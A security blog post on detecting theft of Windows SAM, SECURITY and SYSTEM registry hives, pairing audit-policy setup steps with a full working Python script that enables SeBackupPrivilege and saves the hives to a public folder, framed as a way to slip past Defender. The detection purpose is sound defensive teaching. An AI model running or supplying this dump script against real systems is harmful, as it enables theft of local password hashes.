R.B.C (g3tsyst3m)

Super passionate about Infosec…Dwight Schrute level of intensity

3 minute read

You guys know what time it is? IT’S GO TIME! Time to dive in and learn how to detect a red teamer trying to grab your local SAM hashes from the registry.

Detecting SAM Registry Hive Dumps - The Setup

First, open up gpedit.msc

Next, navigate to this section and enable the highlighted subcategories. You really only need to enable like two of these, but this is to prepare you for the next writeup where we will be detecting thumbdrives as they are plugged in to any USB port!

image

Okay now for the tedious part…we need to enable auditing for all three keys: SAM, SECURITY, AND SYSTEM

We will start with setting up auditing for the SAM registry hive file:

Open regedit.exe

right click on SAM

image

Choose "Permissions"

image

Choose "Advanced"

image

Okay, for this next part you want to create a new Security Principal. We want that new principal to be “Everyone” since we want to audit all accounts that try to access this registry key. Once that principal is created, it will look like this:

image

Also make sure you choose "This key only"

Almost there. Next, double click on the newly created "Everyone" Principal. Then, choose "Show advanced permissions" in the upper right hand corner.

That will need to look like this:

image

PHEW! glad that’s over with….or is it?!?! Well sort of. We still have to do what we just did with the SAM registry file to the SECURITY and SYSTEM. But I don’t feel like creating images and typing all this out again, so here’s what we’re going to do. I’m going to list what you need to do below for the SECURITY AND SYSTEM keys for your auditing config needs. Let’s go!

SECURITY

  • Everyone
    • This key only

SECURITY/Cache

  • Everyone
    • This key and subkeys

SECURITY/Policy/Secrets

  • Everyone
    • This key and subkeys

SYSTEM

  • Everyone
    • This key only

Detecting SAM Registry Hive Dumps - Execution Time!!!

Okay, you can choose to dump the SAM, SECURITY, and SYSTEM files manually via regedit.exe (You’ll likely get snagged by Windows Defender AV). Or….you could do the tactical way. Let’s go the tactical route. We’re going to use python to write our registry dump script:

Download the raw python script here: dumpy.py

Or, simply copy pasta from here:

import win32security
import win32api
import win32con
import win32process
import os
import sys
import winreg
import ntsecuritycon as ntc
import pywintypes


def ElevatedorNot():
    thehandle=win32security.OpenProcessToken(win32api.GetCurrentProcess(), win32con.TOKEN_QUERY)
    elevated = win32security.GetTokenInformation(thehandle, win32security.TokenElevation)
    #print("is token elevated?", elevated)
    if elevated == 1:
        print("[+] elevated status: TokenIsElevated!!!")
        return True
    else:
        print("[!] token is not elevated...")
        return False

def SetBackupPrivilege():
    try:
        thehandle=win32security.OpenProcessToken(win32api.GetCurrentProcess(), win32con.TOKEN_ADJUST_PRIVILEGES | win32con.TOKEN_QUERY)
        id = win32security.LookupPrivilegeValue(None, "SeBackupPrivilege")
        newPrivileges = [(id, win32security.SE_PRIVILEGE_ENABLED)]
        win32security.AdjustTokenPrivileges(thehandle, False, newPrivileges)
        print("[+] successfully gained SeBackupPrivilege!!!!")
        return True
    except:
        print("[!] couldn't get seDebugPrivilege...")
        return False

def dumpreg():
    #Sam File
    samhandle=win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, "SAM", 0, win32con.KEY_ALL_ACCESS)
    win32api.RegSaveKey(samhandle, "c:\\users\\public\\sam.save", None)
    win32api.RegCloseKey(samhandle)
    
    #System File
    systemhandle=win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, "SYSTEM", 0, win32con.KEY_ALL_ACCESS)
    win32api.RegSaveKey(systemhandle, "c:\\users\\public\\system.save", None)
    win32api.RegCloseKey(systemhandle)
    
    
    #Security File (we dont have permissions to get this by default...but it's really only useful for domain creds and I just want local admin)
    try:
        securityhandle=win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, "SECURITY", 0, win32con.KEY_ALL_ACCESS)
        win32api.RegSaveKey(securityhandle, "c:\\users\\public\\security.save", None)
        win32api.RegCloseKey(securityhandle)
    except:
        print("you don't have permission to grab the SECURITY file...")
    return True
if not ElevatedorNot():
    print("[!] not elevated...\n")
    exit()
if not SetBackupPrivilege():
    print("[!] could not get seBackupPrivilege...\n")
    exit()
if dumpreg():
    print("[+] Successfully dumped SAM, SYSTEM, and SECURITY files!!!\n")
    exit()
else:
    print("[!] couldn't dump registry...\n")
f.close()

Save it, and run it:

image

If everything was setup correctly, you should see the following in windows event logs:

image

And last but certainly not least, in Elastic!

image

image

Hope this helps my fellow red team and blue teamers out there. It’s knowledge you need regardless of which role you’re in. 😸 Blue team for obvious reasons. Red team, to see the possibilities built-in to Windows for detecting your clever tricks. Until next time, adios!

Leave a comment

You may also enjoy

Malware EDR Evasion Techniques

6 minute read

Yo, how’s it going everyone. Sorry it’s been a while since my last post. Fear not, I’m geared up and ready to dive in to a full discussion on Malware evasi...